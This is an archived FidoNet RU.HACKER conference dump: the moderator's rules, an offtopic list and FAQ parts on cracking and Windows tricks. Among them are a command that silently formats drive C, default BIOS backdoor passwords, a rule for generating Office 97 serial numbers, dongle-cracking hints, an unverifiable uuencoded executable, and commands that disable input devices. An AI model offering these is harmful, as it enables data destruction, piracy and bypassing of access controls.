кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8698 [1-10330] K/s From : Moderator's Post 23-Jan-04 00:00:01 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8699 [1-10330] K/s From : Moderator's Post 23-Jan-04 00:00:01 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8700 [1-10330] K/s From : Moderator's Post 23-Jan-04 00:00:01 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8701 [1-10330] K/s From : Moderator's Post 23-Jan-04 00:00:01 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. 